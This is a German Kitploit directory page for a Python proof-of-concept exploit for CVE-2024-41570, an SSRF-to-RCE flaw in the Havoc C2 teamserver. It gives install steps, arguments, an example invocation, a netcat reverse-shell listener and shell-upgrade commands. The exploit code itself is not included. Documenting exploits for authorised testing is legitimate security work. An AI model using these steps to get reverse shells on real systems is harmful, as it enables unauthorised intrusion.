Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-41570 — Automatisierter Reverse-Shell-Exploit über WebSocket | Havoc-C2-SSRF mit RCE | Kitploit
Tools/GitHubGitHub/diemoeve/cve-2024-41570
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRed TeamingRemote-Access-Tool
GitHubdiemoeve/cve-2024-41570

CVE-2024-41570

Automatisierter Reverse-Shell-Exploit über WebSocket | Havoc-C2-SSRF mit RCE

Repository anzeigen
12214vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-41570 | Havoc C2 SSRF with RCE | Automated Reverse Shell Exploit via WebSocket

Dieses Skript bietet einen Python-basierten Proof-of-Concept (PoC) zur Ausnutzung eines anfälligen WebSocket-basierten Dienstes. Das Skript automatisiert die Agentenregistrierung, die WebSocket-Payload-Übermittlung und die Remote-Befehlsausführung, um eine Reverse Shell herzustellen.

Features

  • Registriert einen Agenten am Zieldienst.
  • Öffnet einen WebSocket und sendet Handshake- und Authentifizierungspayloads.
  • Führt Befehle remote über eine Reverse Shell aus.
  • Bietet einen geführten Workflow mit klaren Anweisungen.

Prerequisites

  • Python 3.x auf Ihrem Rechner installiert.
  • Installieren Sie die erforderlichen Abhängigkeiten mit:
    root@kitploit:~
    pip install -r requirements.txt
    

Installation

  1. Klonen Sie dieses Repository:
    root@kitploit:~
    git clone https://github.com/kit4py/CVE-2024-41570.git
    
  2. Wechseln Sie in das Projektverzeichnis:
root@kitploit:~
cd CVE-2024-41570
  • Installieren Sie die Abhängigkeiten:
    root@kitploit:~
    pip install -r requirements.txt
    
  • Usage

    Führen Sie das Skript mit den erforderlichen Argumenten aus:

    root@kitploit:~
    python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port>
    

    Arguments

    • -t: Ziel-URL des WebSocket-Servers.
    • -i: IP-Adresse des Team-Servers von Havoc.
    • -p: Port des Team-Servers von Havoc.
    • -U: Benutzername für die WebSocket-Authentifizierung.
    • -P: Passwort für die WebSocket-Authentifizierung.
    • -l: Listener-IP für die Reverse Shell (Ihr Rechner).
    • -L: Listener-Port für die Reverse Shell (Ihr Rechner).

    Example Command

    root@kitploit:~
    python3 exploit.py -t http://example.com -i 127.0.0.1 -p 40056 -U 'havocuser' -P 'password123' -l 192.168.1.2 -L 4444
    

    Steps to Execute

    1. Stellen Sie sicher, dass der Zieldienst läuft und anfällig ist.
    2. Führen Sie das Skript mit den erforderlichen Parametern aus.
    3. Starten Sie in einem separaten Terminal einen Listener:
      root@kitploit:~
      nc -lvnp <listener_port>
      
    4. Shell upgraden:
      root@kitploit:~
      python -c 'import pty; pty.spawn("/bin/bash")' 
      export TERM=xterm-256color
      stty rows 67 columns 318
      

    Dependencies

    Das Skript benötigt die folgenden Python-Bibliotheken:

    • requests
    • pycryptodome

    Installieren Sie sie mit dem Befehl:

    root@kitploit:~
    pip install -r requirements.txt
    

    Security Notice

    Dieses Skript ist ausschließlich für Bildungszwecke bestimmt. Stellen Sie sicher, dass Sie die ausdrückliche Berechtigung zum Testen des Zielsystems haben. Die missbräuchliche Verwendung dieses Skripts kann gegen Gesetze und ethische Richtlinien verstoßen.

    References

    Inspiriert von Default Havoc Poc

    Contributing

    Beiträge sind willkommen! Forken Sie das Repository und reichen Sie einen Pull-Request ein.

    License

    Dieses Projekt ist unter der MIT-Lizenz lizenziert. Weitere Details finden Sie in der Datei LICENSE.

    Tool herunterladen